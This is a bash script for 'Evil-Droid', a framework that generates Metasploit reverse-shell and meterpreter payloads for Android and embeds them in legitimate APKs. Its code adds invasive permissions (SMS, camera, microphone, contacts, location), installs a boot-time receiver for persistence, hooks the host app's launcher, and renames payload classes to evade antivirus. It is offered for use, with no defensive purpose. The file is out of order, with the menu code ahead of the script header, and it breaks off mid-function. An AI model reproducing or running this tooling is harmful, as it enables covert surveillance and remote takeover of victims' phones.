#function suite
function suite()
{
while true; do
echo ""
suit=$(zenity --list --title "☢ EVIL-DROID OPTIONS ☢" --text "Would you like to continue?" --radiolist --column "Choose" --column "Option" TRUE "Main-Menu" FALSE "Exit" --width 305 --height 270 2> /dev/null)
case $suit in
Main-Menu) clear;main;;
Exit) echo -e $yellow "";apache_svc_stop;postgresql_stop;echo " Good Bye !!";echo "";exit;;
esac
done
}
#function clean files
function clean()
{
rm $directory/* > /dev/null 2>&1
rm $path/.jpeg > /dev/null 2>&1
rm $path/
.txt > /dev/null 2>&1
rm /var/www/html/*.apk > /dev/null 2>&1
rm /var/www/html/$index.html > /dev/null 2>&1
}
start=$(zenity --question --title="☢ Evil-Droid Framework ☢" --text "Execute framework and Services?" --width 270 2> /dev/null)
if [ "$?" -eq "0" ]; then
apache_svc_start
postgresql_start
else
clear
echo ""
echo -e $lightgreen "╔──────────────────────────────────────────────╗"
echo -e $lightgreen "| Author: Mascerano Bachir |"
echo -e $lightgreen "| Evil-Droid Framework $ver - Dev-labs.co |"
echo -e $lightgreen "| Credits to : MrPedroubuntu , Kader Achraf |"
echo -e $lightgreen "| , youcef yahia |"
echo -e $lightgreen "| and Mohammed Yacine |"
echo -e $lightgreen "┖──────────────────────────────────────────────┙"
echo ""
apache_svc_stop
postgresql_stop
exit
fi
clear
#main menu
function main()
{
while :
do

    print_ascii_art
    echo -e $green ""
    echo "╔──────────────────────────────────────────────╗"
    echo "|          Evil-Droid Framework $ver           |"
    echo "|      Hack & Remote android plateform         |"
    echo "┖──────────────────────────────────────────────┙"
    echo "[1] APK MSF                                     "
    echo "[2] BACKDOOR APK ORIGINAL (OLD)                 "
    echo "[3] BACKDOOR APK ORIGINAL (NEW)                 "
    echo "[4] BYPASS AV APK (ICON CHANGE)                 "
    echo "[5] START LISTENER                              "
    echo "[c] CLEAN                                       "
    echo "[q] QUIT                                        "
    read -p "[?] Select>: " option
    echo
    
    case "$option" in 
        1)  echo -e $lightgreen "[✔] APK MSF"
            echo -e $green
            get_lhost
            get_lport
            echo
            payload_name
            get_payload
            echo
            spinlong
            gen_payload
            mv $apk_name.apk $path/evilapk > /dev/null 2>&1
            error0
            sleep 2
            echo ""
            zenity --title "☢ EVIL-DROID ☢" --info --text "APK PAYLOAD : $path/evilapk/$apk_name.apk " --width 400 > /dev/null 2>&1
            atkv
            echo
            ;;
        2)  echo -e $lightgreen "[✔] BACKDOOR APK ORIGINAL (OLD)"
            echo -e $green
            get_lhost
            get_lport
            echo
            payload_name
            get_payload
            echo
            orig_apk
            echo
            spinlong
            up_apktook
            embed_payload
            echo 
            mv $apk_name.apk $path/evilapk > /dev/null 2>&1
            error
            sleep 2
            echo ""
            zenity --title "☢ EVIL-DROID ☢" --info --text "BACKDOORED APK : $path/evilapk/$apk_name.apk " --width 400 > /dev/null 2>&1
            atkv 
            echo
            ;;
        3)  echo -e $lightgreen "[✔] BACKDOOR APK ORIGINAL (NEW)"
            echo -e $green
            get_lhost
            get_lport
            echo
            payload_name
            get_payload
            echo
            orig_apk
            echo
            spinlong
            gen_payload
            up_apktook
            apk_decomp1
            apk_decomp
            perms
            hook_smalies
            spinlong
            apk_comp1
            sign
            echo 
            mv $apk_name.apk $path/evilapk > /dev/null 2>&1
            error
            sleep 2
            echo ""
            zenity --title "☢ EVIL-DROID ☢" --info --text "BACKDOORED APK : $path/evilapk/$apk_name.apk " --width 400 > /dev/null 2>&1
            atkv 
            echo
            ;;
        4)  echo -e $lightgreen "[✔] BYPASS AV APK"
            echo -e $green
            get_lhost
            get_lport
            echo
            payload_name
            get_payload1
            echo
            quests
            mv $apk_name.apk $path/evilapk > /dev/null 2>&1
            error
            sleep 2
            echo 
            zenity --title "☢ EVIL-DROID ☢" --info --text "APK SIGNED : $path/evilapk/$apk_name.apk " --width 400 > /dev/null 2>&1
            atkv 
            echo
            ;;
        5)  echo -e $lightgreen "[✔] START LISTENER"
            echo -e $green
            get_lhost
            get_lport
            echo
            get_payload
            echo
            listener
            suite 
            echo
            ;;
        c)  echo -e $lightgreen "[✔] clean up all files"
            echo
            clean
            echo
            zenity --title "☢ EVIL-DROID ☢" --info --text "All Files Are Removed " --width 400 > /dev/null 2>&1
            echo
            clear
            ;;
        q)  echo -e $yellow " Good Bye !!"
            apache_svc_stop
            postgresql_stop
            echo
            exit 0 
            ;;
        *)  echo -e $red  "【X】 Invalid option, please write a valid number【X】"
            echo
            sleep 2
            ;;
    esac
done

}
main

#!/usr/bin/env bash
#
# Evil-Droid Framework . version 0.3
# Evil-Droid is a framework that create & generate & embed apk payload to penetrate android platform
# 
#                  Created By Mascerano Bachir .
#                 Website: http://www.dev-labs.co
#           YTB : https://www.youtube.com/c/mascerano%20bachir  
#        FCB : https://www.facebook.com/kali.linux.pentesting.tutorials
#Speciak thanks to : MrPedroubuntu , Kader Achraf , youcef yahia and Mohammed Yacine
#
# this is an open source tool if you want to modify or add something . Please give me a copy.

# resize terminal window
resize -s 40 70 > /dev/null
#Colors
cyan='\e[0;36m'
lightcyan='\e[96m'
green='\e[0;32m'
lightgreen='\e[1;32m'
white='\e[1;37m'
red='\e[1;31m'
yellow='\e[1;33m'
blue='\e[1;34m'
Escape="\033";
white="${Escape}[0m";
RedF="${Escape}[31m";
GreenF="${Escape}[32m";
LighGreenF="${Escape}[92m"
YellowF="${Escape}[33m";
BlueF="${Escape}[34m";
CyanF="${Escape}[36m";
Reset="${Escape}[0m";
# Check root
[[ `id -u` -eq 0 ]] > /dev/null 2>&1 || { echo  $red "You must be root to run the script"; echo ; exit 1; }
clear
# check internet 
function checkinternet() 
{
  ping -c 1 baidu.com > /dev/null 2>&1
  if [[ "$?" != 0 ]]
  then
    echo -e $yellow " Checking For Internet: ${RedF}SUCSESS"
    echo
    echo -e $red "This Script Needs An Active Internet Connection"
    echo
    echo -e $red " Enter Evil-Droid "
    echo && sleep 2
    exit
  else
    echo -e $yellow " Checking For Internet: ${LighGreenF}CONNECTED"
  fi
}
checkinternet
sleep 2
#Define options
path=`pwd`
lanip=`hostname -I`
publicip=`dig +short myip.opendns.com @resolver1.opendns.com`
ver="v0.3"
APKTOOL="$path/tools/apktool.jar"
VAR1=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # smali dir renaming
VAR2=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # smali dir renaming
VAR3=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Payload.smali renaming
VAR4=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Pakage name renaming 1
VAR5=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Pakage name renaming 2
VAR6=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Pakage name renaming 3
VAR7=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # New name for word 'payload'
VAR8=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # New name for word 'metasploit'
perms='   <uses-permission android:name="android.permission.INTERNET"/>\n    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>\n    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>\n    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>\n    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>\n    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>\n    <uses-permission android:name="android.permission.SEND_SMS"/>\n    <uses-permission android:name="android.permission.RECEIVE_SMS"/>\n    <uses-permission android:name="android.permission.RECORD_AUDIO"/>\n    <uses-permission android:name="android.permission.CALL_PHONE"/>\n    <uses-permission android:name="android.permission.READ_CONTACTS"/>\n    <uses-permission android:name="android.permission.WRITE_CONTACTS"/>\n    <uses-permission android:name="android.permission.WRITE_SETTINGS"/>\n    <uses-permission android:name="android.permission.CAMERA"/>\n    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>\n    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>\n    <uses-permission android:name="android.permission.SET_WALLPAPER"/>\n    <uses-permission android:name="android.permission.READ_CALL_LOG"/>\n    <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>\n    <uses-permission android:name="android.permission.WAKE_LOCK"/>\n    <uses-permission android:name="android.permission.READ_SMS"/>'
echo ""
sleep 1
# spinner for Metasploit Generator
spinlong ()
{
    bar=" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
    barlength=${#bar}
    i=0
    while ((i < 100)); do
        n=$((i*barlength / 100))
        printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}"
        ((i += RANDOM%5+2))
        sleep 0.02
    done
}
# detect ctrl+c exiting
trap ctrl_c INT
ctrl_c() {
clear
echo -e $red"[*] (Ctrl + C ) Detected, Trying To Exit... "
echo -e $red"[*] Stopping Services... "
apache_svc_stop
postgresql_stop
sleep 1
echo ""
echo -e $yellow"[*] Thanks For Using Evil-Droid  :)"
exit
}
#detect system
echo -e $blue
sudo cat /etc/issue.net
#check dependencies existence
echo -e $blue "" 
echo "® Checking dependencies configuration ®" 
echo "                                       " 
# check if metasploit-framework is installed
which msfconsole > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e $green "[ ✔ ] Metasploit-Framework..............${LighGreenF}[ found ]"
which msfconsole > /dev/null 2>&1
sleep 2
else
echo -e $red "[ X ] Metasploit-Framework  -> ${RedF}not found "
echo -e $yellow "[ ! ] Installing Metasploit-Framework "
sudo apt-get install metasploit-framework -y
echo -e $blue "[ ✔ ] Done installing ...."
which msfconsole > /dev/null 2>&1
sleep 2
fi
#check if xterm is installed
which xterm > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e $green "[ ✔ ] Xterm.............................${LighGreenF}[ found ]"
which xterm > /dev/null 2>&1
sleep 2
else
echo ""
echo -e $red "[ X ] xterm -> ${RedF}not found! "
sleep 2
echo -e $yellow "[ ! ] Installing Xterm "
sleep 2
echo -e $green ""
sudo apt-get install xterm -y
clear
echo -e $blue "[ ✔ ] Done installing .... "
which xterm > /dev/null 2>&1
fi
#check if zenity is installed
which zenity > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e $green "[ ✔ ] Zenity............................${LighGreenF}[ found ]"
which zenity > /dev/null 2>&1
sleep 2
else
echo ""
echo -e $red "[ X ] Zenity -> ${RedF}not found! "
sleep 2
echo -e $yellow "[ ! ] Installing Zenity "
sleep 2
echo -e $green ""
sudo apt-get install zenity -y
clear
echo -e $blue "[ ✔ ] Done installing .... "
which zenity > /dev/null 2>&1
fi
#Check for Android Asset Packaging Tool
which aapt > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e $green "[ ✔ ] Aapt..............................${LighGreenF}[ found ]"
which aapt > /dev/null 2>&1
sleep 2
else
echo ""
echo -e $red "[ X ] Aapt -> ${RedF}not found! "
sleep 2
echo -e $yellow "[ ! ] Installing Aapt "
sleep 2
echo -e $green ""
sudo apt-get install aapt -y
sudo apt-get install android-framework-res -y
clear
echo -e $blue "[ ✔ ] Done installing .... "
which aapt > /dev/null 2>&1
fi
#Check for Apktool Reverse Engineering
which apktool > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e $green "[ ✔ ] Apktool...........................${LighGreenF}[ found ]"
which aapt > /dev/null 2>&1
sleep 2
else
echo ""
echo -e $red "[ X ] Apktool -> ${RedF}not found! "
sleep 2
echo -e $yellow "[ ! ] Installing Apktool "
sleep 2
echo -e $green ""
sudo apt-get install apktool -y
clear
echo -e $blue "[ ✔ ] Done installing .... "
which apktool > /dev/null 2>&1
fi
#check for zipalign
which zipalign > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e $green "[ ✔ ] Zipalign..........................${LighGreenF}[ found ]"
which aapt > /dev/null 2>&1
sleep 2
else
echo ""
echo -e $red "[ X ] Zipalign -> ${RedF}not found! "
sleep 2
echo -e $yellow "[ ! ] Installing Zipalign "
sleep 2
echo -e $green ""
sudo apt-get install zipalign -y
clear
echo -e $blue "[ ✔ ] Done installing .... "
which zipalign > /dev/null 2>&1
fi
directory="$path/evilapk"
if [ ! -d "$directory" ]; then
	echo "Creating the output directory..."
	mkdir $directory
        sleep 3
fi
echo -e $red "╔────────────────────────────────────────────────╗"
echo -e $red "|    Evil-Droid Framework $ver - Dev-labs.co     |"
echo -e $red "|   Please do not upload APK to VirusTotal.com   |"
echo -e $red "┖────────────────────────────────────────────────┙"
#function ascii banner
function print_ascii_art {
echo -e $lightgreen "             .           .           "          
echo -e $lightgreen "             M.          .M          "     
echo -e $lightgreen "              MMMMMMMMMMM.           "     
echo -e $lightgreen "           .MMM\MMMMMMM/MMM.         "     
echo -e $lightgreen "          .MMM.7MMMMMMM.7MMM.        "     
echo -e $lightgreen "         .MMMMMMMMMMMMMMMMMMM        "     
echo -e $lightgreen "         MMMMMMM.......MMMMMMM       "     
echo -e $lightgreen "         MMMMMMMMMMMMMMMMMMMMM       "     
echo -e $lightgreen "    MMMM MMMMMMMMMMMMMMMMMMMMM MMMM  "   
echo -e $lightgreen "   dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "   
echo -e $lightgreen "   dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "   
echo -e $lightgreen "   dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "   
echo -e $lightgreen "   dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "   
echo -e $lightgreen "   dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "   
echo -e $lightgreen "   dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "   
echo -e $lightgreen "   dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "   
echo -e $lightgreen "    MMM8 MMMMMMMMMMMMMMMMMMMMM 8MMM  "   
echo -e $lightgreen "         MMMMMMMMMMMMMMMMMMMMM       "   
echo -e $lightgreen "         MMMMMMMMMMMMMMMMMMMMM       "   
echo -e $lightgreen "             MMMMM   MMMMM  $ver     "   
echo -e $lightgreen "             MMMMM   MMMMM           "   
echo -e $lightgreen "             MMMMM   MMMMM           "   
echo -e $lightgreen "             MMMMM   MMMMM           "   
echo -e $lightgreen "             .MMM.   .MMM.           " 
echo -e $lightgreen "     Mascerano Bachir - Dev-labs     "                                 
}
#function lhost
function get_lhost() 
{
  LHOST=$(zenity --title="☢ SET LHOST ☢" --text "Your-Local-ip: $lanip ; Your-Public-ip: $publicip" --entry-text "$lanip" --entry --width 300 2> /dev/null)
}
#function lport
function get_lport() 
{
  LPORT=$(zenity --title="☢ SET LPORT ☢" --text "example: 4444" --entry-text "4444" --entry --width 300 2> /dev/null)
}
#function payload
function get_payload()
{
  PAYLOAD=$(zenity --list --title "☢ EVIL-DROID ☢" --text "\nChose payload option:" --radiolist --column "Choose" --column "Option" TRUE "android/shell/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter_reverse_tcp" FALSE "android/meterpreter_reverse_http" FALSE "android/meterpreter_reverse_https" --width 400 --height 400 2> /dev/null)
}
function get_payload1()
{
  PAYLOAD=$(zenity --list --title "☢ EVIL-DROID ☢" --text "\nChose payload option:" --radiolist --column "Choose" --column "Option" TRUE "android/shell/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" --width 400 --height 400 2> /dev/null)
}
#function name
function payload_name()
{
 apk_name=$(zenity --title "☢ PAYLOAD NAME ☢" --text "example: evilapk" --entry --entry-text "evilapk" --width 300 2> /dev/null)
}
#function original apk
function orig_apk()
{
 orig=$(zenity --title "☢ ORIGINAL APK ☢" --filename=$path --file-selection --file-filter "*.apk" --text "chose the original (apk)" 2> /dev/null) 
}
#function change icon
function change_icon()
{
 iconos=$(zenity --title "☢ CHOOSE ICON ☢" --filename=$path --file-selection --file-filter "*.png" --text "chose your own icon." 2> /dev/null) 
}
#function generate payload
function gen_payload()
{
 echo -e $yellow ""
 echo "[*] Generating apk payload"
 spinlong
 xterm -T " GENERATE APK PAYLOAD" -e msfvenom -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -a dalvik --platform android R -o $apk_name.apk > /dev/null 2>&1
}
function embed_payload()
{
 echo -e $yellow ""
 echo "[*] Embeding apk payload in orginal apk"
 spinlong
 xterm -T " EMBED APK PAYLOAD" -e msfvenom -x $orig -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -a dalvik --platform android R -o $apk_name.apk > /dev/null 2>&1
}
#function update apktool
function up_apktook()
{
 echo -e $yellow ""
 echo "[*] Removing 1.apk framework file..."
 spinlong
 apktool empty-framework-dir --force > /dev/null 2>&1
}
#function apktool
function apk_decomp()
{
 echo -e $yellow ""
 echo "[*] Decompiling Payload APK..."
 spinlong
 xterm -T "Decompiling Payload" -e java -jar $APKTOOL d -f -o $path/payload $path/$apk_name.apk > /dev/null 2>&1
 rm $apk_name.apk
}
function apk_comp()
{
 echo -e $yellow ""
 echo "[*] Rebuilding APK file..."
 spinlong
 xterm -T "Rebuilding APK" -e java -jar $APKTOOL b $path/payload -o evil.apk > /dev/null 2>&1
 rm -r payload > /dev/null 2>&1
}
function apk_decomp1()
{
 echo -e $yellow ""
 echo "[*] Decompiling Original APK..."
 spinlong
 xterm -T "Decompiling Original" -e java -jar $APKTOOL d -f -o $path/original $orig > /dev/null 2>&1
}
function apk_comp1()
{
 echo -e $yellow ""
 echo "[*] Rebuilding Backdoored APK..."
 spinlong
 xterm -T "Rebuilding APK" -e java -jar $APKTOOL b $path/original -o evil.apk > /dev/null 2>&1
 rm -r payload > /dev/null 2>&1
 rm -r original > /dev/null 2>&1
}
#function errors
function error()
{
 rc=$?
 if [ $rc != 0 ]; then
   echo -e $red ""
   echo "【X】 Failed to rebuild backdoored apk【X】"
   echo
   apache_svc_stop
   postgresql_stop
   exit $rc
 fi
}
function error0()
{
 rc=$?
 if [ $rc != 0 ]; then
   echo -e $red ""
   echo "【X】 An Error Was Occured .Ty Again【X】"
   echo
   apache_svc_stop
   postgresql_stop
   exit $rc
 fi
}
#function apache2 service
function apache_svc_start()
{
 service apache2 start | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Start apache2 service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
}
function apache_svc_stop()
{
 service apache2 stop | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Stop apache2 service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
}
#function postgresql service
function postgresql_start()
{
 service postgresql start | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Start postgresql service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
}
function postgresql_stop()
{
 service postgresql stop | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Stop postgresql service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
}
# function adding permission
function perms()
{
 echo -e $yellow ""
 echo "[*] Adding permission and Hook Smali"
 spinlong
 package_name=`head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'` 2>&1
 package_dash=`head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'|sed 's|/|.|g'` 2>&1
 tmp=$package_name
 sed -i "5i\ $perms" $path/original/AndroidManifest.xml
 rm $path/payload/smali/com/metasploit/stage/MainActivity.smali 2>&1
 sed -i "s|Lcom/metasploit|L$package_name|g" $path/payload/smali/com/metasploit/stage/*.smali 2>&1
 cp -r $path/payload/smali/com/metasploit/stage $path/original/smali/$package_name > /dev/null 2>&1
 rc=$?
 if [ $rc != 0 ];then
  app_name=`grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's%/[^/]*$%%'` 2>&1
  app_dash=`grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's|/|.|g'|sed 's%.[^.]*$%%'` 2>&1
  tmp=$app_name
  sed -i "s|L$package_name|L$app_name|g" $path/payload/smali/com/metasploit/stage/*.smali 2>&1
  cp -r $path/payload/smali/com/metasploit/stage $path/original/smali/$app_name > /dev/null 2>&1
  amanifest="    </application>"
  boot_cmp='        <receiver android:label="MainBroadcastReceiver" android:name="'$app_dash.stage.MainBroadcastReceiver'">\n            <intent-filter>\n                <action android:name="android.intent.action.BOOT_COMPLETED"/>\n            </intent-filter>\n        </receiver><service android:exported="true" android:name="'$app_dash.stage.MainService'"/></application>'
  sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1    
 fi
 amanifest="    </application>"
 boot_cmp='        <receiver android:label="MainBroadcastReceiver" android:name="'$package_dash.stage.MainBroadcastReceiver'">\n            <intent-filter>\n                <action android:name="android.intent.action.BOOT_COMPLETED"/>\n            </intent-filter>\n        </receiver><service android:exported="true" android:name="'$package_dash.stage.MainService'"/></application>'
 sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1    
 android_nam=$tmp
}
# functions hook smali
function hook_smalies()
{
 launcher_line_num=`grep -n "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml |awk -F ":" 'NR==1{ print $1 }'` 2>&1
 android_name=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<application"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'` 2>&1
 android_activity=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'` 2>&1
 android_targetActivity=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|grep -m1 ""|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'` 2>&1
 if [ $android_name ]; then
  echo
  echo "##################################################################"
  echo "inject Smali: $android_name.smali" |awk -F ":/" '{ print $NF }'
  hook_num=`grep -n "    return-void" $path/original/smali/$android_name.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1
  echo "In line:$hook_num"
  echo "##################################################################"
  starter="   invoke-static {}, L$android_nam/stage/MainService;->start()V"
  sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_name.smali > /dev/null 2>&1
 elif [ ! -e $android_activity ]; then
  echo
  echo "##################################################################"
  echo "inject Smali: $android_activity.smali" |awk -F ":/" '{ print $NF }'
  hook_num=`grep -n "    return-void" $path/original/smali/$android_activity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1
  echo "In line:$hook_num"
  echo "##################################################################"
  starter="   invoke-static {}, L$android_nam/stage/MainService;->start()V"
  sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_activity.smali > /dev/null 2>&1
  rc=$?
  if [ $rc != 0 ]; then
    spinlong
    echo -e $red ""
    echo "[x] cant find : $android_activity.smali"
    echo "[*] try another ..."
    spinlong
    sleep 2
    echo
    echo "##################################################################"
    echo "inject Smali: $android_targetActivity.smali" |awk -F ":/" '{ print $NF }'
    hook_num=`grep -n "    return-void" $path/original/smali/$android_targetActivity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1
    echo "In line:$hook_num"
    echo "##################################################################"
    starter="   invoke-static {}, L$android_nam/stage/MainService;->start()V"
    sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_targetActivity.smali > /dev/null 2>&1
  fi 
 fi
}
#function flagged by av & updating smalies
function flagg()
{
 echo -e $yellow ""
 echo "[*] Scrubbing the payload contents to avoid AV signatures..."
 spinlong
 mv payload/smali/com/metasploit payload/smali/com/$VAR1
 mv payload/smali/com/$VAR1/stage payload/smali/com/$VAR1/$VAR2
 mv payload/smali/com/$VAR1/$VAR2/Payload.smali payload/smali/com/$VAR1/$VAR2/$VAR3.smali
 sleep 2
 if [ -f payload/smali/com/$VAR1/$VAR2/PayloadTrustManager.smali ]; then
    echo
    echo -e $red "[ X ] an error was occured . Please upgrade your distro .."
    apache_svc_stop
    postgresql_stop
    exit 1
 fi
 sed -i "s#/metasploit/stage#/$VAR1/$VAR2#g" payload/smali/com/$VAR1/$VAR2/*
 sed -i "s#Payload#$VAR3#g" payload/smali/com/$VAR1/$VAR2/*
 sed -i "s#com.metasploit.meterpreter.AndroidMeterpreter#com.$VAR4.$VAR5.$VAR6#" payload/smali/com/$VAR1/$VAR2/$VAR3.smali
 sed -i "s#payload#$VAR7#g" payload/smali/com/$VAR1/$VAR2/$VAR3.smali
 sed -i "s#com.metasploit.stage#com.$VAR1.$VAR2#" payload/AndroidManifest.xml
 sed -i "s#metasploit#$VAR8#" payload/AndroidManifest.xml
 sed -i "s#MainActivity#$apk_name#" payload/res/values/strings.xml
 sed -i '/.SET_WALLPAPER/d' payload/AndroidManifest.xml
 sed -i '/WRITE_SMS/a<uses-permission android:name="android.permission.SET_WALLPAPER"/>' payload/AndroidManifest.xml
}
function flagg_original()
{
 echo -e $yellow ""
 echo "[*] Scrubbing the payload contents to avoid AV signatures..."
 spinlong
 rm $path/payload/smali/com/metasploit/stage/MainActivity.smali 2>&1
 mv payload/smali/com/metasploit/stage payload/smali/com/metasploit/$VAR1
 mv payload/smali/com/metasploit/$VAR1/MainBroadcastReceiver.smali payload/smali/com/metasploit/$VAR1/$VAR2.smali
 mv payload/smali/com/metasploit/$VAR1/MainService.smali payload/smali/com/metasploit/$VAR1/$VAR3.smali
 mv payload/smali/com/metasploit/$VAR1/Payload.smali payload/smali/com/metasploit/$VAR1/$VAR4.smali
 sleep 2
 if [ -f payload/smali/com/metasploit/$VAR1/PayloadTrustManager.smali ]; then
    echo
    echo -e $red "[ X ] an error was occured . Please upgrade your distro .."
    apache_svc_stop
    postgresql_stop
    exit 1
 fi
 echo -e $yellow ""
 echo "[*] Adding permission and Hook Smali"
 spinlong
 sed -i "5i\ $perms" $path/original/AndroidManifest.xml
 package_name=`head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'` 2>&1
 package_dash=`head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'|sed 's|/|.|g'` 2>&1
 tmp=$package_name
 sed -i "s|Lcom/metasploit/stage|L$package_name/$VAR1|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
 sed -i "s|L$package_name/$VAR1/Payload|L$package_name/$VAR1/$VAR4|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
 sed -i "s|L$package_name/$VAR1/MainService|L$package_name/$VAR1/$VAR3|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
 sed -i "s|L$package_name/$VAR1/MainBroadcastReceiver|L$package_name/$VAR1/$VAR2|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
 cp -r $path/payload/smali/com/metasploit/$VAR1 $path/original/smali/$package_name > /dev/null 2>&1
 rc=$?
 if [ $rc != 0 ];then
  app_name=`grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's%/[^/]*$%%'` 2>&1
  app_dash=`grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's|/|.|g'|sed 's%.[^.]*$%%'` 2>&1
  tmp=$app_name
  sed -i "s|L$package_name/$VAR1|L$app_name/$VAR1|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
  sed -i "s|L$app_name/$VAR1/$VAR4|L$app_name/$VAR1/$VAR4|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
  sed -i "s|L$app_name/$VAR1/$VAR3|L$app_name/$VAR1/$VAR3|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
  sed -i "s|L$app_name/$VAR1/$VAR2|L$app_name/$VAR1/$VAR2|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
  cp -r $path/payload/smali/com/metasploit/$VAR1 $path/original/smali/$app_name > /dev/null 2>&1
  amanifest="    </application>"
  boot_cmp='        <receiver android:label="'$VAR2'" android:name="'$app_dash.$VAR1.$VAR2'">\n            <intent-filter>\n                <action android:name="android.intent.action.BOOT_COMPLETED"/>\n            </intent-filter>\n        </receiver><service android:exported="true" android:name="'$app_dash.$VAR1.$VAR3'"/></application>'
  sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1
 fi
 amanifest="    </application>"
 boot_cmp='        <receiver android:label="'$VAR2'" android:name="'$package_dash.$VAR1.$VAR2'">\n            <intent-filter>\n                <action android:name="android.intent.action.BOOT_COMPLETED"/>\n            </intent-filter>\n        </receiver><service android:exported="true" android:name="'$package_dash.$VAR1.$VAR3'"/></application>'
